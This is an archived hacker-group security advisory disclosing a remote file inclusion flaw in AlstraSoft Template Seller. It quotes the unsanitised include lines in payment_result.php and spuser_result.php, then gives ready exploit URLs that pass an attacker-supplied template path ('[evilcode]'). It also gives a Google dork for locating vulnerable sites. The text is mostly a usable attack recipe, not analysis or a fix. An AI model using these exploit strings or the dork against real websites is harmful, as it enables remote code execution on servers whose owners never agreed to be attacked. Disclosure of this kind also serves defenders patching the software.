SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



#############################SolpotCrew Community################################
#
#        AlstraSoft Template Seller Remote File Include Vulnerability 
#
#        Download file : http://www.alstrasoft.com/template.htm
#
#################################################################################
#
#
#       Bug Found By : NoGe a.k.a da_jackass 
#
#       contact: jong_amq@xxxxxxxxxxx 
# 
#       Website : http://nyubicrew.org/adv/Noge_adv_01.txt
#
################################################################################
#
#
#      Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
#              yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
#              #papmahackerlink #nyubi #maluku-hacker #papuahacker
#              
###############################################################################
# Vulnerable found in 

payment_result.php and spuser_result.php 

line 6 include("$config[template_path]/onlyheader.php"); 
line 7 include("$config[template_path]/onlysearch.php"); 


# Exploit 

/payment/payment_result.php?config[template_path]=[evilcode] 

/payment/spuser_result.php?config[template_path]=[evilcode] 


# google dork 

"Powered by AlstraSoft Template Seller" 

######################################E.O.F##################################


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux